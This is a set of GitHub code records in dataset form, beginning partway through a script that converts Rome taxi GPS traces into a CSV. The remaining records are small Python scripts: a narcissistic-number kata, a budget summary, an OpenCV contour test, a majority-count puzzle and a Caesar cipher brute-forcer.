rome taxi trace data spans slightly over two months, following edit was necessary to enure correct day count\n\tif some_DT_obj.month==3:\n\t\tsim_daynum = sim_daynum+29\n\treturn int(sim_daynum)\n\ndef SimWeekDayNum(some_DT_obj):\n\tsim_weekday = some_DT_obj.weekday()\n\treturn sim_weekday\n\ndef SimTimeSeconds(some_DT_obj):\n\tglobal sim_start_time\n\tsim_time_s = (some_DT_obj-sim_start_time).total_seconds()\n\treturn int(sim_time_s)\n\ndef PyUnixTimeConv(some_DT_obj):\n \"\"\" func to convert DateTime Obj to Unix Epoch time, in SECONDS, hence rounding\"\"\"\n output_unix_time = some_DT_obj.timestamp()\n return round(output_unix_time)\n\n\n\n# ---------------------------------------\n# spatial stuff/funcs\n\n\ndef LatConv2(GPS_str):\n\tnumeric_const_pattern = '[-+]? (?: (?: \\d* \\. \\d+ ) | (?: \\d+ \\.? ) )(?: [Ee] [+-]? \\d+ ) ?'\n\trx = re.compile(numeric_const_pattern, re.VERBOSE)\n\ta = rx.findall(GPS_str)\n\tlat1 = round(float(a[0]),6)\n\treturn lat1\n\ndef LongConv2(GPS_str):\n\tnumeric_const_pattern = '[-+]? (?: (?: \\d* \\. \\d+ ) | (?: \\d+ \\.? ) )(?: [Ee] [+-]? \\d+ ) ?'\n\trx = re.compile(numeric_const_pattern, re.VERBOSE)\n\ta = rx.findall(GPS_str)\n\tlong1 = round(float(a[1]),6)\n\treturn long1\n\n\ndef haversine_pc(lon1,lat1,lon2,lat2):\n lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n dlon = lon2-lon1\n dlat = lat2-lat1\n a = np.sin(dlat/2.0)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2.0)**2\n c = 2 * np.arcsin(np.sqrt(a))\n Hdistance = 6371e3*c #working in metres!\n return Hdistance\n\n\ndef LatLong2XYConv(latitude,longitude,datumlat,datumlong):\n \n y = round(spherical_dist([latitude,datumlong],[datumlat,datumlong]))\n x = round(spherical_dist([datumlat,longitude],[datumlat,datumlong]))\n \n if latitude<datumlat: #IMPLIES taxi is south of datum (South=-ve),(North=+ve)\n y = -y\n if longitude<datumlong: #IMPLIES taxi is west of datum (West=-ve) ,(East=+ve)\n x = -x\n\n return [x, y]\n\ndef Long2XConv(longitude):\n datumlat = RTGV.DatumLat\n datumlong = RTGV.DatumLong\n x = round(haversine_pc(datumlat,longitude,datumlat,datumlong))\n if longitude<datumlong: #IMPLIES taxi is west of datum (West=-ve) ,(East=+ve)\n x = -x\n return int(x)\n\ndef Lat2YConv(latitude):\n datumlat = RTGV.DatumLat\n datumlong = RTGV.DatumLong\n y = round(haversine_pc(latitude,datumlong,datumlat,datumlong))\n if latitude<datumlat: #IMPLIES taxi is south of datum (South=-ve),(North=+ve)\n y = -y\n return int(y)\n\n \n\nnew_dfcols = ['taxi_id','dt_ts','unix_ts','weekday','trace_day','latitude','longitude','x','y']\nnew_tracedf = pd.DataFrame(columns=new_dfcols)\n\n#outputfile\noutput_trace_file = '/home/pietro/Taxi-Datasets/initial_filtered_rome_trace.csv'\nnew_tracedf.to_csv(output_trace_file, header=new_dfcols, index = False, sep=\";\")\n\n#Obtain Chunk of Data from text file\nraw_trace_data_filename = '/home/pietro/Taxi-Datasets/rome_taxi_trace_feb.txt'\n\n\nreader=pd.read_table(raw_trace_data_filename,sep=\";\",chunksize=20000 ,header = None, iterator=True)\nchunk_index = 0\nfor chunk in reader:\n chunk_index +=1\n new_tracedf = pd.DataFrame()\n new_tracedf = pd.DataFrame(columns=new_dfcols)\n tracedf = chunk\n\n# duplicate removal, still haven't decided what to do with entries with identical ts but different long/lats...\n#remove entries outside of bounding box later?\n\n tracedf = tracedf.drop_duplicates()\n\n\n tracedf.columns = ['taxi_id','ts','gps']\n# taxi ID's \n new_tracedf['taxi_id'] = tracedf['taxi_id']\n\n# Trace data timestamps\n new_tracedf['dt_ts'] = tracedf['ts'].apply(PyDateTimeConv)\n new_tracedf['unix_ts'] = new_tracedf['dt_ts'].apply(PyUnixTimeConv)\n new_tracedf['weekday'] = new_tracedf['dt_ts'].apply(SimWeekDayNum)\n new_tracedf['trace_day'] = new_tracedf['dt_ts'].apply(SimDayNum)\n\n# Taxi locations\n new_tracedf['latitude'] = tracedf['gps'].apply(LatConv2)\n new_tracedf['longitude'] = tracedf['gps'].apply(LongConv2)\n \n new_tracedf['x'] = new_tracedf['longitude'].apply(Long2XConv)\n new_tracedf['y'] = new_tracedf['latitude'].apply(Lat2YConv)\n\n\n new_tracedf.to_csv(output_trace_file, mode='a', index = False, sep=\";\",header=False)\n\n\n","repo_name":"pc0179/RomeTaxiData","sub_path":"taxi_trace_import.py","file_name":"taxi_trace_import.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44531267389","text":"\"\"\"\r\nSolution to the CodeWars kata Does my number look big in this?\r\nLink:\r\nhttps://www.codewars.com/kata/5287e858c6b5a9678200083c\r\n\"\"\"\r\n\r\ndef narcissistic( value ):\r\n #A Narcissistic Number is a number which is the sum of its own digits, each raised to the power of the number of digits in a given base. In this Kata, we will restrict ourselves to decimal (base 10).\r\n # For example, take 153 (3 digits): 1^3 + 5^3 + 3^3 = 1 + 125 + 27 = 153 and 1634 (4 digits): 1^4 + 6^4 + 3^4 + 4^4 = 1 + 1296 + 81 + 256 = 1634 \r\n # The Challenge: Your code must return true or false depending upon whether the given number is a Narcissistic number in base 10.\r\n number=str(value)\r\n num=0\r\n for ch in number:\r\n num+=int(ch)**len(number)\r\n return num==value\r\n\r\n# --------------------------------------------Extras--------------------------------------------\r\n\r\n#Other solutions\r\n\r\ndef narcissistic2( value ):\r\n vstr = str(value)\r\n nvalue = sum(int(i)**len(vstr) for i in vstr)\r\n return nvalue == value\r\n","repo_name":"DavidSiretMarques/CodeWars-Katas","sub_path":"6kyu/does-my-number-look-big-in-this.py","file_name":"does-my-number-look-big-in-this.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8280262556","text":"# Import dependencies\r\nimport os\r\nimport csv\r\n\r\n# Create Path\r\ninput_path = os.path.join('..', 'Resources', 'budget_data.csv') \r\n\r\n# Open and Read File\r\nwith open(input_path) as csvfile:\r\n\r\n# CSV reader \r\n csvreader = csv.reader(csvfile, delimiter=',')\r\n\r\n print(csvreader)\r\n\r\n\r\n# Read the header row first\r\n csv_header = next(csvreader)\r\n print(f\"CSV Header: {csv_header}\")\r\n \r\n# Store Variables\r\n months = []\r\n profit = [] \r\n change_in_profit = []\r\n \r\n\r\n# Read each row of data after the header\r\n for row in csvreader:\r\n print(row)\r\n months.append(row[0])\r\n profit.append(int(row[1]))\r\n\r\n\r\n\r\n# The total number of months included in the dataset\r\nprint(f\"Total_Months: {len(months)}\") \r\n\r\n# The net total amount of \"Profit/Losses\" over the entire period \r\nprint(f\"Total_Profit: ${sum(profit)}\")\r\n\r\n\r\n# Calculate the changes in \"Profit/Losses\" over the entire period, then find the average of those changes\r\n\r\nfor p in range(len(profit)-1):\r\n change_in_profit.append(profit[p+1]-profit[p])\r\n \r\n \r\nprint(f\"Average Change: {round(sum(change_in_profit)/len(change_in_profit),2)}\") \r\n\r\n# The greatest increase in profits (date and amount) over the entire period\r\n\r\ngreatest_increase = max(change_in_profit)\r\ngreatest_increase_month = change_in_profit.index(max(change_in_profit)) + 1\r\nprint(f\"Greatest_Increase: {months[greatest_increase_month]}\")\r\n \r\n# The greatest decrease in losses (date and amount) over the entire period\r\n\r\ngreatest_decrease = min(change_in_profit)\r\ngreatest_decrease_month = change_in_profit.index(min(change_in_profit)) + 1\r\nprint(f\"Greatest_Decrease: {months[greatest_decrease_month]}\")\r\n\r\n\r\n\r\n","repo_name":"chrisvaslaw/pythonhw-resubmitted-","sub_path":"mainbank.py","file_name":"mainbank.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36355910915","text":"import numpy as np\nimport cv2\n\n\n#img = cv2.imread('/Users/SimonDahan/Documents/Telecom-ParisTech/PACT/Estimation du mouvement/OpenCvtest/bandcontour.png',0)\n#imgray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nimg = cv2.imread('/Users/SimonDahan/Documents/Telecom-ParisTech/PACT/Estimation du mouvement/OpenCvtest/bandecontour.png')\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nret,thresh = cv2.threshold(gray,127,255,0)\ncontours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\ncnt = contours[4]\nimg2 =cv2.drawContours(gray, [cnt], 0, (0,255,0), 3)\ncv2.imshow('test',img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#cv2.imwrite('testcv.jpg',img2)","repo_name":"Fran-cois/SmartDelivery","sub_path":"src/Estimation_mouvement/OpenCv/contourCV.py","file_name":"contourCV.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6243792613","text":"cases = int(input())\nall = []\nfor i in range(cases):\n case = input()\n all.append(case)\nfirst = all[0]\nsecond = None\nfirstcount = 0\nfor i in all:\n if i == first:\n firstcount += 1\n if i != first:\n second = i\n if i != first:\n second = i\nif firstcount > len(all) - firstcount:\n print(first)\nelse:\n print(second)\n","repo_name":"MohammedTAgha/Brain-fu__n","sub_path":"ICPC TRAINING/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13007517982","text":"import sys\n\nargc = len(sys.argv)\n\nif argc == 1:\n\tword = input(\"Word to decrypt: \")\nelse:\n\tword = sys.argv[1]\n\nword = word.lower()\n\nfor key in range(1, 26):\n\tprint(f\"key: {key} | \", end='')\n\tfor c in word:\n\t\tprint(chr((ord(c) - ord('a') - key) % 26 + ord('a')), end = '')\n\tprint()","repo_name":"maylisw/cryptography","sub_path":"caesar/brute_force.py","file_name":"brute_force.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}